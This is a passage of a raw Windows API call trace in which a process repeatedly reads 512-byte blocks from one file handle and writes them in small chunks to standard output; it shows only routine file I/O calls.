0x50 [0207.726] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] GetFileType (hFile=0x50) returned 0x1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] GetFileType (hFile=0x50) returned 0x1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.726] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.726] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.726] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.726] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] GetFileType (hFile=0x50) returned 0x1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] GetFileType (hFile=0x50) returned 0x1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) 
returned 1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] GetFileType (hFile=0x50) returned 0x1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] GetFileType (hFile=0x50) returned 0x1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] GetFileType (hFile=0x50) returned 0x1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] GetFileType (hFile=0x50) returned 0x1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] GetFileType (hFile=0x50) returned 0x1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.727] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0207.727] GetFileType (hFile=0x50) returned 0x1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.727] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.727] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.727] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.727] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] GetFileType (hFile=0x50) returned 0x1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] GetFileType (hFile=0x50) returned 0x1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] GetFileType (hFile=0x50) returned 0x1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] GetFileType (hFile=0x50) returned 0x1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] GetFileType (hFile=0x50) returned 0x1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] GetFileType (hFile=0x50) returned 0x1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] GetFileType (hFile=0x50) returned 0x1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] GetFileType (hFile=0x50) returned 0x1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.728] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.728] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.728] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.728] ReadFile 
(in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] GetFileType (hFile=0x50) returned 0x1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] GetFileType (hFile=0x50) returned 0x1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] GetFileType (hFile=0x50) returned 0x1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] GetFileType (hFile=0x50) returned 0x1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] GetFileType (hFile=0x50) returned 0x1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] GetFileType (hFile=0x50) returned 0x1 [0207.729] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] GetFileType (hFile=0x50) returned 0x1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] GetFileType (hFile=0x50) returned 0x1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.729] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.729] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.729] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.730] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] GetFileType (hFile=0x50) returned 0x1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] GetFileType (hFile=0x50) returned 0x1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, 
lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] GetFileType (hFile=0x50) returned 0x1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] GetFileType (hFile=0x50) returned 0x1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] GetFileType (hFile=0x50) returned 0x1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] GetFileType (hFile=0x50) returned 0x1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] GetFileType (hFile=0x50) returned 0x1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, 
lpOverlapped=0x0) returned 1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] GetFileType (hFile=0x50) returned 0x1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.731] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.731] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.731] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.731] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] GetFileType (hFile=0x50) returned 0x1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] GetFileType (hFile=0x50) returned 0x1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] GetFileType (hFile=0x50) returned 0x1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] GetFileType (hFile=0x50) returned 0x1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] WriteFile (in: hFile=0x50, 
lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] GetFileType (hFile=0x50) returned 0x1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] GetFileType (hFile=0x50) returned 0x1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] GetFileType (hFile=0x50) returned 0x1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] GetFileType (hFile=0x50) returned 0x1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.732] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.732] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.732] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0207.732] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] GetFileType (hFile=0x50) returned 0x1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] GetFileType (hFile=0x50) returned 0x1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] GetFileType (hFile=0x50) returned 0x1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] GetFileType (hFile=0x50) returned 0x1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] GetFileType (hFile=0x50) returned 0x1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] 
GetFileType (hFile=0x50) returned 0x1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] GetFileType (hFile=0x50) returned 0x1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] GetFileType (hFile=0x50) returned 0x1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.733] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.733] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.733] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.733] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] GetFileType (hFile=0x50) returned 0x1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] GetFileType (hFile=0x50) returned 0x1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | 
out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] GetFileType (hFile=0x50) returned 0x1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] GetFileType (hFile=0x50) returned 0x1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] GetFileType (hFile=0x50) returned 0x1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] GetFileType (hFile=0x50) returned 0x1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] GetFileType (hFile=0x50) returned 0x1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, 
